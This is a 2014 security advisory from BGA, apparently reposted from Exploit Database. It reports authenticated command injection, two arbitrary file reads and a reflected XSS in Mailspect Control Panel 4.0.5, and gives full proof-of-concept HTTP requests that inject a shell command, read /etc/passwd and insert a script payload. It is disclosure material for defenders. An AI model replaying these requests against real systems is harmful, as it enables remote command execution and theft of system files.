Mailspect Control Panel 4.0.5 – Multiple Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： Onur Alanbel (BGA)
  日期： 2014-06-27
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/33887/

• Document Title:
  ============
  Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities
  
  Release Date:
  ===========
  June 21, 2014
  
  Product & Service Introduction:
  ========================
  Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched 
  in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin.
  
  Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter.Subsequently, 
  the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in 
  content filers and reputation engines.
  
  Abstract Advisory Information:
  =======================
  BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel 
  4.0.5 web application.
  
  Vulnerability Disclosure Timeline:
  =========================
  May 4, 2014	:	Contact with Vendor
  May 16, 2014	:	Vendor Response
  June 21, 2014	:	Public Disclosure
  
  Discovery Status:
  =============
  Published
  
  Affected Product(s):
  ===============
  Multilayered Email Security & Archive for Gateways, MTA's & Servers
  Product: Mailspect Control Panel 4.0.5
  Other versions may be affected. 
  
  Exploitation Technique:
  ==================
  RCE:	Remote, Authenticated
  AFR:	Remote, Authenticated
  XSS:	Remote, Unauthenticated
  
  Severity Level:
  ===========
  High
  
  Technical Details & Description:
  ========================
  1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami > 
  /tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to 
  "status_info.cgi?group=default" page.
  Other parameters with the suffix "_cmd" are probably vulnerable.
  
  2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary 
  file name like "/etc/passwd" will cause the file's content's disclosure.
  
  3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd" 
  will cause the file's content's disclosure.
  
  4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads 
  the Javascript code's execution.
  
  Proof of Concept (PoC):
  ==================
  Proof of Concept RCE Request:
  
  POST /system_module.cgi HTTP/1.1
  Host: 192.168.41.142:20001
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://192.168.41.142:20001/system_module.cgi?group=default
  Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; 
  p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 1282
   
  post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60
  
  2. Proof of Concept AFR Request 1:
  
  GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1
  Host: 192.168.41.142:20001
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default
  Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; 
  p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
  Connection: keep-alive 
  
  3. Proof of Concept AFR Request 2:
  
  POST /monitor_manage_logs.cgi HTTP/1.1
  Host: 192.168.41.142:20001
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default
  Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; 
  p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 85
   
  group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on
  
  4. Proof of Concept XSS Request:
  
  GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1
  Host: 192.168.41.142:20001
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Connection: keep-alive 
  
  Solution Fix & Patch:
  ================
  XSS will be patched at version 4.0.7
  There will be no patch for RCE and AFR vulnerabilities as stated at the vendor’s reply.
  
  Security Risk:
  ==========
  The risk of the vulnerabilities above estimated as high.
  
  Credits & Authors:
  ==============
  Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAŞ
  
  Disclaimer & Information:
  ===================
  The information provided in this advisory is provided as it is without any warranty. BGA disclaims allwarranties, either expressed or 
  implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any 
  case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
  			
  Domain:	www.bga.com.tr/advisories.html
  Social:		twitter.com/bgasecurity
  Contact:	bilgi@bga.com.tr
  	
  Copyright © 2014 | BGA Security